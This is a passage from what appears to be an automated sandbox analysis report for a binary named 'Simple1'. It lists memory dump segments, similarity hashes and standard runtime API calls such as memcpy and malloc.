            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
            • Instruction ID: 4bb8c94d2e3c7f30650ffd7ecc83a4787ac86ecfc7fe4a062c43a3fb7a4663e0
            • Opcode Fuzzy Hash: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
            • Instruction Fuzzy Hash: FC516332608E8285DB119F29E4503ADB7A4FB84BA4F94423AEA9D837D8DF3CD448C750
            APIs
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF71E395133), ref: 00007FF71E399F3A
              • Part of subcall function 00007FF71E39B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF71E395133), ref: 00007FF71E399F65
            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF71E395133), ref: 00007FF71E399F75
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E399FA9
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
            • Instruction ID: 79e479b198276dba445427422b2338f41455b77275f9bd4528b95c81786d22e2
            • Opcode Fuzzy Hash: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
            • Instruction Fuzzy Hash: 5941B722B19E4291EA10EB129444269A3A4FB44BF1F994739EE7E477C4EF3CE489C310
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
            • String ID:
            • API String ID: 1155477157-0
            • Opcode ID: 026ef5e54fd43f4e89d52efecd4f8820d3e46297275fb0fcc80e4699443208a0
            • Instruction ID: 66f400e6995c56af33931330ba65e09e8cd6816bec0af25bd5c58f705c29869d
            • Opcode Fuzzy Hash: 026ef5e54fd43f4e89d52efecd4f8820d3e46297275fb0fcc80e4699443208a0
            • Instruction Fuzzy Hash: 2231C422A0AF42D1EA14BB16A44027DE2A5EB45BB0F940B38DE7E077D0DF3CF4968350
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: memcpy$Concurrency::cancel_current_task
            • String ID:
            • API String ID: 326894585-0
            • Opcode ID: b64a975be9c4b282e7f0182c7e8225502916e0377c6f8446b38c6363c047ee1a
            • Instruction ID: 8dd39806b343da04ede8558eb03979c7ddfda02506d4aff16319261ce57677db
            • Opcode Fuzzy Hash: b64a975be9c4b282e7f0182c7e8225502916e0377c6f8446b38c6363c047ee1a
            • Instruction Fuzzy Hash: 4521D822A09F4649EE14BB16A4403B9A290AB057B4F940B38DE6D077D6DF7CF5868310